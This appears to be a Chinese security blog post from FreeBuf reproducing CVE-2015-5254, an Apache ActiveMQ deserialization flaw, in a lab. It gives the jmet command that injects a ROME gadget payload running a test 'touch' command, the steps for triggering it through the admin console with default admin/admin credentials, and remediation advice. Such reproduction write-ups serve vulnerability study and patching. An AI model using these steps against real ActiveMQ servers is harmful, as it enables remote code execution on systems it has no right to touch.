官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
CVE-2015-5254:ActiveMQ反序列化
LemonUCKJ- 关注
CVE-2015-5254:ActiveMQ反序列化
环境展示:
工具下载地址:https://download.csdn.net/download/HMX404/87156298
复现过程:
1.执行命令 ,此时会给ActiveMQ添加一个事件队列:
java -jar jmet-0.1.0.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME 192.168.66.143 61616
执行创建文件命令
2.访问:http://192.168.66.143:8161/admin/browse.jsp?JMSDestination=event
用户名:admin 密码:admin
发现生成队列
3.点击队列对应的编号,执行命令:
生成文件成功,证明可以执行命令
漏洞原理:
Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。
解决方法:
1.打补丁,http://activemq.apache.org/security-advisories.data/CVE-2015-5254-announcement.txt;
2.升级到最新版本;
3.有WAF的可以配置相关规则进行拦截;
更多资讯请访问个人博客 www.zuoci.com
本文为 LemonUCKJ 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
漏洞复现
LemonUCKJ LV.3
这小伙不懒了,不想填写个人描述!
- 4 文章数
- 2 关注者
【春秋云境】CVE-2023-33440 Faculty Evaluation System v1.0 存在未授权任意文件上传漏洞漏洞
2024-04-01
SQL注入点判断及注入方式
2022-03-14
网站只有一个登录框怎么办?———用户名密码重置的6种绕过情况
2022-03-14
文章目录